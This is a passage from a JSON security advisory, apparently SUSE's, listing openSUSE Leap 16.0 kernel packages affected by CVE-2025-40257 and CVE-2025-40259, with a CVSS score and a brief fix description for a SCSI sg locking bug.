"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
